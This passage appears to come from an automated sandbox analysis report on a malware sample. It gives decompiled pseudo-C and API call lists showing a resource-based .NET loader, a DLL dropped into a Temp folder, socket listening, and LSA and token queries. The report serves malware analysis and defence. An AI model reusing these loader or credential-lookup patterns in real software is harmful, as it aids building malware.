                                                                                                • Part of subcall function 00403D29: SendMessageA.USER32 ref: 00403D3B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                              • String ID:
                                                                                              • API String ID: 3748168415-3916222277
                                                                                              • Opcode ID: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                                                                                              • Instruction ID: d407fede90f1340f75a9edbd02c1d8e6092547d547c096207559e891c258f88e
                                                                                              • Opcode Fuzzy Hash: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                                                                                              • Instruction Fuzzy Hash: C1119D71105608BFEF21AF52DD4099B3729EF84769F01803AFA05751E1C37D8C62CB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              • buffer overflow - Buffer = %p, BufferEnd = %p, size = %u, xrefs: 6F1DAFD7
                                                                                              • pointer is the same as the buffer, xrefs: 6F1DAFFA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: buffer overflow - Buffer = %p, BufferEnd = %p, size = %u$pointer is the same as the buffer
                                                                                              • API String ID: 4104443479-2199830383
                                                                                              • Opcode ID: a03464d7cff85418a5e49547480990eda18758217e21b250ff1ec99b8c594918
                                                                                              • Instruction ID: c88f5f897ca36135a4312492c6f8e8c465d6ae5e9b01012d9dfd0f16af9d1595
                                                                                              • Opcode Fuzzy Hash: a03464d7cff85418a5e49547480990eda18758217e21b250ff1ec99b8c594918
                                                                                              • Instruction Fuzzy Hash: E011C8B9200209AFCB04CF44C891D5ABBB6BF88394F15C648FD494B346D731FAA1CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                                                              				int _t5;
                                                                                              				long _t7;
                                                                                              				struct _OVERLAPPED* _t11;
                                                                                              				intOrPtr* _t15;
                                                                                              				void* _t17;
                                                                                              				int _t21;
                                                                                              
                                                                                              				_t15 = __esi;
                                                                                              				_t11 = __ebx;
                                                                                              				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                                                                              					_t7 = lstrlenA(E004029E8(0x11));
                                                                                              				} else {
                                                                                              					E004029CB(1);
                                                                                              					 *0x409f78 = __al;
                                                                                              				}
                                                                                              				if( *_t15 == _t11) {
                                                                                              					L8:
                                                                                              					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                                              				} else {
                                                                                              					_t5 = WriteFile(E004058A2(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll", _t7, _t17 + 8, _t11);
                                                                                              					_t21 = _t5;
                                                                                              					if(_t21 == 0) {
                                                                                              						goto L8;
                                                                                              					}
                                                                                              				}
                                                                                              				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t17 - 4));
                                                                                              				return 0;
                                                                                              			}










                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                                                                                              • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll, xrefs: 004024BC, 004024E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: FileWritelstrlen
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll
                                                                                              • API String ID: 427699356-1960073921
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00405465(char* _a4) {
                                                                                              				char* _t3;
                                                                                              				char* _t5;
                                                                                              
                                                                                              				_t5 = _a4;
                                                                                              				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                                                              				while( *_t3 != 0x5c) {
                                                                                              					_t3 = CharPrevA(_t5, _t3);
                                                                                              					if(_t3 > _t5) {
                                                                                              						continue;
                                                                                              					}
                                                                                              					break;
                                                                                              				}
                                                                                              				 *_t3 =  *_t3 & 0x00000000;
                                                                                              				return  &(_t3[1]);
                                                                                              			}






                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\5.exe,C:\Users\user\Desktop\5.exe,80000000,00000003), ref: 0040546B
                                                                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C77,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\5.exe,C:\Users\user\Desktop\5.exe,80000000,00000003), ref: 00405479
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrlen
                                                                                              • String ID: C:\Users\user\Desktop
                                                                                              • API String ID: 2709904686-1246513382
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00405577(CHAR* _a4, CHAR* _a8) {
                                                                                              				int _t10;
                                                                                              				int _t15;
                                                                                              				CHAR* _t16;
                                                                                              
                                                                                              				_t15 = lstrlenA(_a8);
                                                                                              				_t16 = _a4;
                                                                                              				while(lstrlenA(_t16) >= _t15) {
                                                                                              					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                                                              					_t10 = lstrcmpiA(_t16, _a8);
                                                                                              					if(_t10 == 0) {
                                                                                              						return _t16;
                                                                                              					}
                                                                                              					_t16 = CharNextA(_t16);
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}







                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040557E
                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405597
                                                                                              • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004055A5
                                                                                              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405785,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004055AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 190613189-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Executed Functions

                                                                                              C-Code - Quality: 100%
                                                                                              			E00401489() {
                                                                                              				void* _v8;
                                                                                              				struct HRSRC__* _t4;
                                                                                              				long _t10;
                                                                                              				struct HRSRC__* _t12;
                                                                                              				void* _t16;
                                                                                              
                                                                                              				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
                                                                                              				_t12 = _t4;
                                                                                              				if(_t12 == 0) {
                                                                                              					L6:
                                                                                              					ExitProcess(0);
                                                                                              				}
                                                                                              				_t16 = LoadResource(GetModuleHandleW(0), _t12);
                                                                                              				if(_t16 != 0) {
                                                                                              					_v8 = LockResource(_t16);
                                                                                              					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
                                                                                              					_t13 = _v8;
                                                                                              					if(_v8 != 0 && _t10 != 0) {
                                                                                              						L00401000(_t13, _t10); // executed
                                                                                              					}
                                                                                              				}
                                                                                              				FreeResource(_t16);
                                                                                              				goto L6;
                                                                                              			}









                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                                                                                              • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                                                                                              • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                                                                                              • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                                                                                                • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                                                                                              • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                                                                                              • ExitProcess.KERNEL32 ref: 004014EE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                                                                                              • String ID: v2.0.50727
                                                                                              • API String ID: 2372384083-2350909873
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • listen.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E0BB4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: listen
                                                                                              • String ID:
                                                                                              • API String ID: 3257165821-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • bind.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E0FCF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: bind
                                                                                              • String ID:
                                                                                              • API String ID: 1187836755-0
                                                                                              • Opcode ID: dc16f19f873dec56d5718c562158bf4b1e0ac45d60bfbfbbe341a5ef6dc6997a
                                                                                              • Instruction ID: a86f0bb3183df88a9f9cdca128c3385602144211258f9b9c7e36f993c78a7f21
                                                                                              • Opcode Fuzzy Hash: dc16f19f873dec56d5718c562158bf4b1e0ac45d60bfbfbbe341a5ef6dc6997a
                                                                                              • Instruction Fuzzy Hash: 912194755093806FE7128F65CC84B97BFB8EF06310F0884ABE949DF152D364A809CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • bind.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E0FCF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: bind
                                                                                              • String ID:
                                                                                              • API String ID: 1187836755-0
                                                                                              • Opcode ID: 0e8a0439a73ea50131d13f099ac14fc54621457159bfe7776ceec65548037d5d
                                                                                              • Instruction ID: ceaa8a7dcf527321befc813e3a7cc499a2b8eca98c759561201567ec122633a2
                                                                                              • Opcode Fuzzy Hash: 0e8a0439a73ea50131d13f099ac14fc54621457159bfe7776ceec65548037d5d
                                                                                              • Instruction Fuzzy Hash: F11182B1504204AFEB20CF55DC85FA7FBA8EF44721F14846BEE5AAB241D7B4E444CA72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • listen.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E0BB4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: listen
                                                                                              • String ID:
                                                                                              • API String ID: 3257165821-0
                                                                                              • Opcode ID: 1f5bb61e836e8026dc0400aac2d912a78cb49347a64996aaa1c21faf97f1ad85
                                                                                              • Instruction ID: 10eea241f753347307f81a3a9f237cc7e257f15496d1b0aacd2b1281625cdeb7
                                                                                              • Opcode Fuzzy Hash: 1f5bb61e836e8026dc0400aac2d912a78cb49347a64996aaa1c21faf97f1ad85
                                                                                              • Instruction Fuzzy Hash: 6111E971904204AFEB11CF55DC84BA6FBA8EF44321F149467EE59EF241D774A444CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00401E1D() {
                                                                                              				_Unknown_base(*)()* _t1;
                                                                                              
                                                                                              				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
                                                                                              				return _t1;
                                                                                              			}





                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                                                              • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                                                                                              • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6e79b41e2409fb7c8a01e35416fe14d2ea93a5089aec5679f6aa1296cda13a2a
                                                                                              • Instruction ID: 6e3bfe7b594db3460e330843a7b7ae5ea79433dc9d5a36f9ebca38873a2a44b9
                                                                                              • Opcode Fuzzy Hash: 6e79b41e2409fb7c8a01e35416fe14d2ea93a5089aec5679f6aa1296cda13a2a
                                                                                              • Instruction Fuzzy Hash: CC82C474A012688FCB69DF28C894BEDBBB6BB49304F1084EAD509A7354DB319EC5CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004055C5(void* __ecx) {
                                                                                              				void* _t6;
                                                                                              				void* _t14;
                                                                                              				void* _t18;
                                                                                              				WCHAR* _t19;
                                                                                              
                                                                                              				_t14 = __ecx;
                                                                                              				_t19 = GetEnvironmentStringsW();
                                                                                              				if(_t19 != 0) {
                                                                                              					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
                                                                                              					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
                                                                                              					_t18 = _t6;
                                                                                              					if(_t18 != 0) {
                                                                                              						E0040ACF0(_t18, _t19, _t12);
                                                                                              					}
                                                                                              					E00403E03(0);
                                                                                              					FreeEnvironmentStringsW(_t19);
                                                                                              				} else {
                                                                                              					_t18 = 0;
                                                                                              				}
                                                                                              				return _t18;
                                                                                              			}








                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EnvironmentStrings$Free
                                                                                              • String ID:
                                                                                              • API String ID: 3328510275-0
                                                                                              • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                                                                              • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                                                                                              • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                                                                              • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LsaLookupNames2.ADVAPI32(?,00000E80,?,?), ref: 00C5B732
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LookupNames2
                                                                                              • String ID:
                                                                                              • API String ID: 2701605370-0
                                                                                              • Opcode ID: 6860237168ac0c6de663f9bc0e92d55d8bfdab8561684a41c0a5ffc0f3f1aa80
                                                                                              • Instruction ID: 2d9592765e5978bfe59cb08d6e2ae8fa6803968188d9f0dfa4b056a7bb073b33
                                                                                              • Opcode Fuzzy Hash: 6860237168ac0c6de663f9bc0e92d55d8bfdab8561684a41c0a5ffc0f3f1aa80
                                                                                              • Instruction Fuzzy Hash: C5418F7240E3C05FD7138B258C65A62BFB4AF43710F1E85DBD8C49F1A3D669690AC7A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNELBASE(?,00000E80,?,?), ref: 00C5B932
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: 701d1c93f3c0bd7c69a3e7f780500ec7a9ba2b159657e8869d7c89220327b56e
                                                                                              • Instruction ID: f7340b7a790d27597dd6f6720539cf04747840e6eb9ac3e8ee56660ae91e4869
                                                                                              • Opcode Fuzzy Hash: 701d1c93f3c0bd7c69a3e7f780500ec7a9ba2b159657e8869d7c89220327b56e
                                                                                              • Instruction Fuzzy Hash: 68415A2500E3C06FD30387258C65A61BFB4EF47620B0E85DBE8C48B5A3D2296D1AD7B6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00C5BDFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: ea29918558c8cbbdb4b3ca64a9f73d370d56c8570b0e1062c044b2a42aa5ea84
                                                                                              • Instruction ID: 5ba76322d773b9cc784b12384077d86b731b4dea37bfc632ec50ed974ab43892
                                                                                              • Opcode Fuzzy Hash: ea29918558c8cbbdb4b3ca64a9f73d370d56c8570b0e1062c044b2a42aa5ea84
                                                                                              • Instruction Fuzzy Hash: 98319EB5504380AFE722CB25CC45FA2BFF8EF06314F08849AE9849B252D371E909CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 00C5AC51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: 621d84e0931ef262e768383815136ed2ec40445a28f246204c7d3afc2e2c962c
                                                                                              • Instruction ID: 0728040fa1a20863cced6d45cc28182e6e873cf2be93fc9acd8926469f0d4077
                                                                                              • Opcode Fuzzy Hash: 621d84e0931ef262e768383815136ed2ec40445a28f246204c7d3afc2e2c962c
                                                                                              • Instruction Fuzzy Hash: AE31D4B25043846FE7228B25CC85FA7BFFCEF05310F08859AED859B152D625E949CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ClassInfo
                                                                                              • String ID:
                                                                                              • API String ID: 3534257612-0
                                                                                              • Opcode ID: 695e989cebd62263c4bcb49267e44bfea93fa04aec2c60edc5443d3e6aafa3c8
                                                                                              • Instruction ID: cacf33e24a3411dbf1bcda8645e360be9218a5f62c42911185c323c13e0fa96a
                                                                                              • Opcode Fuzzy Hash: 695e989cebd62263c4bcb49267e44bfea93fa04aec2c60edc5443d3e6aafa3c8
                                                                                              • Instruction Fuzzy Hash: B1313CA550E3C09FDB138B219C60A52BFB8AF07214B0D80DBD885CF2A3D2689908C772
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: accept
                                                                                              • String ID:
                                                                                              • API String ID: 3005279540-0
                                                                                              • Opcode ID: 13e2159334501ae17daab9516be85d0865b02871f02545f45829360b0b1152de
                                                                                              • Instruction ID: ae412ebd573908ba53297febd30642caf9749c5d67feef9bc13895bb278c94dd
                                                                                              • Opcode Fuzzy Hash: 13e2159334501ae17daab9516be85d0865b02871f02545f45829360b0b1152de
                                                                                              • Instruction Fuzzy Hash: 67317075509780AFE712CB65DC44B56BFF8EF06214F08849AE9889F253D375A908CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 00C5AD54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: 9cf68b118ac11710fa9c2da79b2ca75c7b16dfd6fb503aea6b9c0d168291d646
                                                                                              • Instruction ID: 85c46475c81cb7657696ceb21bdf1657a258061791a87d157ae0d97393a74e72
                                                                                              • Opcode Fuzzy Hash: 9cf68b118ac11710fa9c2da79b2ca75c7b16dfd6fb503aea6b9c0d168291d646
                                                                                              • Instruction Fuzzy Hash: 9031C4765083846FE722CB65CC84FA2BFB8EF06311F08859AE985CB152D364E94CCB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetProcessTimes.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E0D85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ProcessTimes
                                                                                              • String ID:
                                                                                              • API String ID: 1995159646-0
                                                                                              • Opcode ID: 0a647f831d4933d4a20ec1996c13165b023f1b7747dd0bc9a74bfe53cb2fca3d
                                                                                              • Instruction ID: cadb62189d7c6bde1cb28213efe23436024589d00a0577254d88899cfcf14493
                                                                                              • Opcode Fuzzy Hash: 0a647f831d4933d4a20ec1996c13165b023f1b7747dd0bc9a74bfe53cb2fca3d
                                                                                              • Instruction Fuzzy Hash: 4931D5725093806FEB128F64DC45FA6BFB8EF06310F0884ABE985DB153D365A509D771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileView
                                                                                              • String ID:
                                                                                              • API String ID: 3314676101-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetTokenInformation.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 00C5B19C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InformationToken
                                                                                              • String ID:
                                                                                              • API String ID: 4114910276-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LsaOpenPolicy.ADVAPI32(?,00000E80), ref: 00C5B4BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: OpenPolicy
                                                                                              • String ID:
                                                                                              • API String ID: 2030686058-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateMutexW.KERNELBASE(?,?), ref: 024E0AC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateMutex
                                                                                              • String ID:
                                                                                              • API String ID: 1964310414-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileMappingW.KERNELBASE(?,00000E80,?,?), ref: 024E153E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateFileMapping
                                                                                              • String ID:
                                                                                              • API String ID: 524692379-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(?,00000E80,?,?), ref: 00C5A2FE
                                                                                              Memory Dump Source
